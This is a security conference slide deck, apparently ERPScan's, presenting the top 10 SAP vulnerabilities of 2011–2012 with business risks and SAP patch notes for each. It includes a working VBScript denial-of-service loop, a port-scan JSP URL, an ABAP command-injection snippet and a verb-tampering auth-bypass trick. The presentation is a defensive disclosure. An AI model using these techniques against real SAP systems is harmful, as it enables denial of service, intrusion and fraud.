The presentation provides the list of top 10 SAP vulnerabilities (2011-2012) as well as ways of defense.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
1. Invest
in
security
to
secure
investments
SAP
(In)Security:
New
and
Best
Alexander
Polyakov.
CTO
at
ERPScan
1
2. About
ERPScan
• The
only
360-‐degree
SAP
Security
soluHon
-‐
ERPScan
Security
Monitoring
Suite
for
SAP
• Leader
by
the
number
of
acknowledgements
from
SAP
(
150+
)
• 60+
presenta>ons
key
security
conferences
worldwide
• 25
Awards
and
nomina>ons
• Research
team
-‐
20
experts
with
experience
in
different
areas
of
security
• Headquarters
in
Palo
Alto
(US)
and
Amsterdam
(EU)
2
4. Really
• The
most
popular
business
applicaHon
• More
than
120000
customers
• 74%
of
Forbes
500
4
5. Agenda
• Intro
• SAP
security
history
• SAP
on
the
Internet
• Most
popular
SAP
issues
(OLD)
• Top
10
latest
interesHng
a[acks
(NEW)
• DEMOs
• Conclusion
5
6. 6
3
areas
of
SAP
Security
2010
Applica3on
pla4orm
security
Prevents
unauthorized
access
both
insiders
and
remote
a3ackers
SoluHon:
Vulnerability
Assessment
and
Monitoring
2008
ABAP
Code
security
Prevents
a3acks
or
mistakes
made
by
developers
SoluHon:
Code
audit
2002
Business
logic
security
(SOD)
Prevents
a3acks
or
mistakes
made
SoluHon:
GRC
7. 0
5
10
15
20
25
30
35
2006
2007
2008
2009
2010
2011
2012
Most
popular:
• BlackHat
• HITB
• Troopers
• RSA
• Source
• DeepSec
• etc.
Talks
about
SAP
security
7
8. 0
100
200
300
400
500
600
700
800
900
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
By
April
26,
2012,
a
total
of
2026
notes
SAP
Security
notes
8
9. 0
50
100
150
200
250
300
350
12
-‐SQL
Inj
11
-‐
BOF
10
-‐
Denial
of
service
9
-‐
Remote
Code
ExecuHon
8
-‐
Verb
tampering
7
-‐
Code
injecHon
vulnerability
6
-‐
Hard-‐coded
credenHals
5
-‐
Unauthorized
usage
of
applicaHon
4
-‐
InformaHon
Disclosure
3
-‐
Missing
Auth
check
2
-‐
XSS/Unauthorised
modificaHon
of
1
-‐
Directory
Traversal
Stats
from
:
• 1Q
2012
• 1Q
2010
• 4Q
2009
SAP
vulnerabili>es
by
type
9
10. Top
problems
by
OWASP-‐EAS
(Implementa>on
issues)
• EASAI-‐1
Lack
of
patch
management
• EASAI-‐2
Default
Passwords
for
applicaHon
access
• EASAI-‐3
SOD
conflicts
• EASAI-‐4
Unnecessary
Enabled
ApplicaHon
features
• EASAI-‐5
Open
Remote
management
interfaces
• EASAI-‐6
lack
of
password
lockout/complexity
checks
• EASAI-‐7
Insecure
opHons
• EASAI-‐8
Unencrypted
communicaHons
• EASAI-‐9
Insecure
trust
relaHons
• EASAI-‐10
Guest
access
10
11. Top
problems
by
BIZEC
• BIZEC
TEC-‐01:
Vulnerable
Sojware
in
Use
• BIZEC
TEC-‐02:
Standard
Users
with
Default
Passwords
• BIZEC
TEC-‐03:
Unsecured
SAP
Gateway
• BIZEC
TEC-‐04:
Unsecured
SAP/Oracle
authenHcaHon
• BIZEC
TEC-‐05:
Insecure
RFC
interfaces
• BIZEC
TEC-‐06:
Insufficient
Security
Audit
Logging
• BIZEC
TEC-‐07:
Unsecured
SAP
Message
Server
• BIZEC
TEC-‐08:
Dangerous
SAP
Web
ApplicaHons
• BIZEC
TEC-‐09:
Unprotected
Access
to
AdministraHon
Services
• BIZEC
TEC-‐10:
Insecure
Network
Environment
• BIZEC
TEC-‐11:
Unencrypted
CommunicaHons
11
12. Business
Risks
Espionage
• Stealing
financial
informaHon
• Stealing
corporate
secrets
• Stealing
suppliers
and
customers
list
• Stealing
HR
data
Sabotage
• Denial
of
service
• ModificaHon
of
financial
reports
• Access
to
technology
network
(SCADA)
by
trust
relaHons
Fraud
• False
transacHons
• ModificaHon
of
master
data
• e.t.c.
12
13. SAP
on
the
Internet
MYTH:
SAP
systems
a^acks
available
only
for
insiders
• We
have
collected
data
about
SAP
systems
in
the
WEB
• Have
various
stats
by
countries,
applicaHons,
versions
• InformaHon
from
Google,
Shodan,
Nmap
scan
13
15. About
5000
systems
including
Dispatcher,
Message
server,
SapHostcontrol,
Web-‐
services
SAP
on
the
Internet
15
16. Top
10
vulnerabili>es
2011-‐2012
1. AuthenHcaHon
Bypass
via
Verb
tampering
2.
AuthenHcaHon
Bypass
via
the
Invoker
servlet
3.
Buffer
overflow
in
ABAP
Kernel
4.
Code
execuHon
via
TH_GREP
5.
MMC
read
SESSIONID
6.
Remote
portscan
7.
EncrypHon
in
SAPGUI
8.
BAPI
XSS/SMBRELAY
9.
XML
Blowup
DOS
10.
GUI
ScripHng
DOS
16
17. 10
–
GUI-‐Scrip>ng
DOS:
Descrip>on
• SAP
users
can
run
scripts
which
automate
their
user
funcHons
• A
script
has
the
same
rights
in
SAP
as
the
user
who
launched
it
• Security
message
which
is
shown
to
user
can
be
turned
off
in
the
registry
• Almost
any
user
can
use
SAP
Messages
(SM02
transacHon)
• It
is
possible
to
run
DOS
a[ack
on
any
user
using
a
simple
script
New
Author: Dmitry Chastukhin (ERPScan)
17
18. 10
–
GUI-‐scrip>ng:
Details
If Not IsObject(application) Then
Set SapGuiAuto = GetObject("SAPGUI")
Set application = SapGuiAuto.GetScriptingEngine
End If
If Not IsObject(connection) Then
Set connection = application.Children(0)
End If
If Not IsObject(session) Then
Set session = connection.Children(0)
End If
If IsObject(WScript) Then
WScript.ConnectObject session, "on"
WScript.ConnectObject application, "on"
End If
do
a=a+1
session.findById("wnd[0]").maximize
session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
session.findById("wnd[0]/tbar[0]/btn[0]").press
session.findById("wnd[0]/tbar[1]/btn[34]").press
session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]").sendVKey 4
session.findById("wnd[2]/usr/lbl[1,3]").setFocus
session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
session.findById("wnd[2]").sendVKey 2
session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
session.findById("wnd[1]/tbar[0]/btn[0]").press
Loop Until a>=1000
18
19. 10
–
GUI-‐scrip>ng:
Other
a^acks
Other
a^acks
like
changing
banking
accounts
in
LFBK
also
possible
Script
can
be
uploaded
using:
• SAPGUI
AcHveX
vulnerability
• Teensy
USB
flash
• Any
other
method
of
client
exploitaHon
19
20. 10
–
GUI-‐scrip>ng:
Business
risks
Ease
of
exploita>on
–
Medium
Sabotage
–
High
Espionage
–
No
Fraud
–
No
20
22. 9
–
XML
Blowup
DOS:
Descrip>on
• WEBRFC
interface
can
be
used
to
run
RFC
funcHons
• By
default
any
user
can
have
access
• Can
execute
at
least
RFC_PING
• SAP
NetWeaver
is
vulnerable
to
malformed
XML
packets
• It
is
possible
to
run
DOS
a[ack
on
server
using
simple
script
• It
is
possible
to
run
over
the
Internet!
New
Author: Alexey Tyurin (ERPScan)
22
24. 9
–
XML
Blowup
DOS:
Business
risks
Ease
of
exploita>on
–
Medium
Espionage
–
No
Fraud
–
No
Sabotage
–
Cri>cal
24
25. 9
–
XML
Blowup
DOS:
Preven>on
•
Disable
WEBRFC
•
Prevent
unauthorized
access
to
WEBRFC
using
S_ICF
•
Install
SAP
notes
1543318
and
1469549
25
26. Author: Dmitry Chastukhin (ERPScan)
8
–
BAPI
script
injec>on/hash
stealing
:
Descrip>on
• SAP
BAPI
transacHon
fails
to
properly
saniHze
input
• Possible
to
inject
JavaScript
code
or
link
to
a
fake
SMB
server
• SAP
GUI
clients
use
Windows
so
their
credenHals
will
be
transferred
to
a[ackers
host.
26
27. New
8
–
BAPI
script
injec>on/hash
stealing:
Demo
27
28. Ease
of
exploita>on
–
Low
Sabotage
–
High
Espionage
–
High
Fraud
–
High
8
–
BAPI
script
injec>on/hash
stealing:
Business
risks
28
29. 7
–
SAP
GUI
bad
encryp>on:
Descrip>on
• SAP
• SAP
FrontEnd
can
save
encrypted
passwords
in
shortcuts
• Shortcuts
stored
in
.sap
file
• This
password
uses
byte-‐XOR
algorithm
with
“secret”
key
• Key
has
the
same
value
for
every
installaHon
of
SAP
GUI
• Any
password
can
be
decrypted
in
1
second
Author:Author: Alexey Sintsov (ERPScan
New
31. 7
–
SAP
GUI
bad
encryp>on:
Business
risks
Sabotage
–
Medium
Fraud
–
High
Espionage
–
High
Ease
of
exploita>on
–
Medium
31
32. 7
–
SAP
GUI
bad
encryp>on:
Preven>on
•
Disable
password
storage
in
GUI
32
33. 6
–
Remote
port
scan
via
JSP:
Descrip>on
•
It
is
possible
to
scan
internal
network
from
the
Internet
•
Authen>ca>on
is
not
required
•
SAP
NetWeaver
J2EE
engine
is
vulnerable
• /ipcpricing/ui/BufferOverview.jsp?
• server=172.16.0.13
• &
port=31337
• &
password=
• &
dispatcher=
• &
targetClient=
• &
view=
Author: Alexander Polyakov (ERPScan)
33
34. 6
–
Remote
port
scan
via
JSP:
Demo
Port
closed
HTTP
port
SAP
port
34
35. 6
–
Remote
port
scan
via
JSP:
Business
risks
Ease
of
exploita>on
–
High
Espionage
–
Medium
Fraud
–
No
Sabotage
–
Low
35
36. 6
–
Remote
port
scan
via
JSP:
Preven>on
•
Install
SAP
notes:
1548548,
1545883,
1503856,
948851,
1545883
•
Disable
unnecessary
applicaHons
36
37. 5
–
MMC
JSESSIONID
stealing:
Descrip>on
• Remote
management
of
SAP
Plaworm
• By
default,
many
commands
go
without
auth
• Exploits
implemented
in
Metasploit
(by
ChrisJohnRiley)
• Most
of
the
bugs
are
informaHon
disclosure
• It
is
possible
to
find
informaHon
about
JSESSIONID
• Only
if
trace
is
ON
Can
be
authen>cated
as
an
exis>ng
user
remotely
1) Original bug by ChrisJohnRiley
2) JSESSIONID by Alexey Sintsov and
Alexey Tyurin (ERPScan)
New
37
39. 5
–
MMC
JSESSIONID
stealing:
Business
risks
Espionage
–
Cri>cal
Sabotage
–
Medium
Fraud
–
High
Ease
of
exploita>on
–
Medium
39
40. 5
–
MMC
JSESSIONID
stealing:
Preven>on
• The
JSESSIONID
by
default
will
not
be
logged
in
log
file
• Don’t
use
TRACE_LEVEL
=
3
on
producHon
systems
or
delete
traces
ajer
use
• Other
info
h[p://help.sap.com/saphelp_nwpi71/helpdata/
en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
40
41. • RCE
vulnerability
in
RFC
module
TH_GREP
• Found
by
Joris
van
de
Vis
• SAP
was
not
properly
patched
(1433101)
• We
have
discovered
that
the
patch
can
be
bypassed
in
Windows
Origina
l
bug
by
Joris
van
de
Vis
(erp-‐sec)
Bypass
by
Alexey
Tyurin
(ERPScan)
4
–
Remote
command
execu>on
in
TH_GREP:
Descrip>on
41
42. 4
–
RCE
in
TH_GREP:
Details
elseif opsys = 'Windows NT'.
concatenate '/c:"' string '"' filename into
grep_params in character mode.
else. /*if linux*/
/* 185 */ replace all occurrences of '''' in
local_string with '''"''"'''.
/* 186 */ concatenate '''' local_string ''''
filename into grep_params
/* 187*/ in character mode.
/* 188*/ endif.
/* 188*/
42
44. 4
-‐
RCE
in
TH_GREP:
More
details
4
ways
to
execute
vulnerable
program
• Using
transacHon
"Se37“
• Using
transacHon
“SM51“
(thanks
to
Felix
Granados)
• Using
remote
RFC
call
"TH_GREP"
• Using
SOAP
RFC
call
"TH_GREP"
via
web
44
46. 4
–
RCE
in
TH_GREP:
Business
risks
Sabotage
–
Medium
Fraud
–
High
Espionage
–
High
Ease
of
exploita>on
–
medium
46
47. 4
–
RFC
in
TH_GREP:
Preven>on
•
Install
SAP
notes
1580017,
1433101
•
Prevent
access
to
criHcal
transacHons
and
RFC
funcHons
•
Check
the
ABAP
code
of
your
Z-‐transacHons
for
similar
vulnerabiliHes
47
48. 3
-‐
ABAP
Kernel
BOF:
Descrip>on
• Presented
by
Andreas
Wiegenstein
at
BlackHat
EU
2011
• Buffer
overflow
in
SAP
kernel
funcHon
C_SAPGPARAM
•
When
NAME
field
is
more
than
108
chars
• Can
be
exploited
by
calling
an
FM
which
uses
C_SAPGPARAM
• Example
of
report
–
RSPO_R_SAPGPARAM
Author: (VirtualForge)
48
50. 3
–
ABAP
Kernel
BOF:
Business
risks
Ease
of
exploita>on
–
Medium
Espionage
–
Cri>cal
Fraud
–
Cri>cal
Sabotage
–
Cri>cal
50
51. 3
–
ABAP
Kernel
BOF:
Preven>on
•
Install
SAP
notes:
- 1493516
–
CorrecHng
buffer
overflow
in
ABAP
system
call
- 1487330
–
PotenHal
remote
code
execuHon
in
SAP
Kernel
•
Prevent
access
to
criHcal
transacHons
and
RFC
funcHons
•
Check
the
ABAP
code
of
your
Z-‐transacHons
for
criHcal
calls
51
52. 2
–
Invoker
Servlet:
Descrip>on
• Rapidly
calls
servlets
by
their
class
name
• Published
by
SAP
in
their
security
guides
• Possible
to
call
any
servlet
from
the
applicaHon
• Even
if
it
is
not
declared
in
WEB.XML
Can
be
used
for
auth
bypass
52
54. 2
–
Invoker
servlet:
Business
risks
Ease
of
use
–
Very
easy!
Espionage
–
High
Sabotage
–
High
Fraud
–
High
54
55. 2
-‐
Invoker
servlet:
Preven>on
• Update
to
the
latest
patch
1467771,
1445998
• “EnableInvokerServletGlobally”
property
of
the
servlet_jsp
must
be
“false”
If
you
can’t
install
patches
for
some
reason,
you
can
check
all
WEB.XML
files
using
ERPScan
web.xml
scanner
manually.
55
57. 1st
Place
–
Verb
Tampering
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-
name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
What
if
we
use
HEAD
instead
of
GET
?
Author: Alexander Polyakov (ERPScan)
57
58. 1st
Place
–
Verb
tampering:
Details
Remotely
without
authen>ca>on!
• CTC
–
Secret
interface
for
managing
J2EE
engine
• Can
be
accessed
remotely
• Can
run
user
management
acHons:
– Add
users
– Add
to
groups
– Run
OS
commands
– Start/Stop
J2EE
58
60. 1
–
Verb
tampering:
More
details
If
patched,
can
be
bypassed
by
the
Invoker
servlet!
60
61. 1
–
Verb
tampering:
Business
risks
Espionage
–
Cri>cal
Sabotage
–
Cri>cal
Fraud
–
Cri>cal
Ease
of
use
–
Very
easy!
61
62. PrevenHon:
• Install
SAP
notes
1503579,1616259
• Install
other
SAP
notes
about
Verb
Tampering
(about
18)
• Scan
applicaHons
using
ERPScan
WEB.XML
check
tool
or
manually
• Secure
WEB.XML
by
deleHng
all
<h[p-‐method>
• Disable
the
applicaHons
that
are
not
necessary
1st
Place
–
Verb
tampering:
Preven>on
62
63. Conclusion
It
is
possible
to
be
protected
from
almost
all
those
kinds
of
issues
and
we
are
working
hard
with
SAP
to
make
it
secure
SAP
Guides
It’s
all
in
your
hands
Regular
Security
assessments
ABAP
Code
review
Monitoring
technical
security
Segrega>on
of
Du>es
63
64. Future
work
Many
of
the
researched
things
cannot
be
disclosed
now
because
of
our
good
relaHonship
with
SAP
Security
Response
Team,
whom
I
would
like
to
thank
for
cooperaHon.
However,
if
you
want
to
see
new
demos
and
0-‐days,
follow
us
at
@erpscan
and
a[end
the
future
presentaHons:
• Just4MeeHng
in
July
(Portugal)
• BlackHat
USA
in
July
(Las
Vegas)
64
65. Greetz
to
our
crew
who
helped:
Dmitriy
Evdokimov,
Alexey
Sintsov,
Alexey
Tyurin,
Pavel
Kuzmin,
Evgeniy
Neelov.
65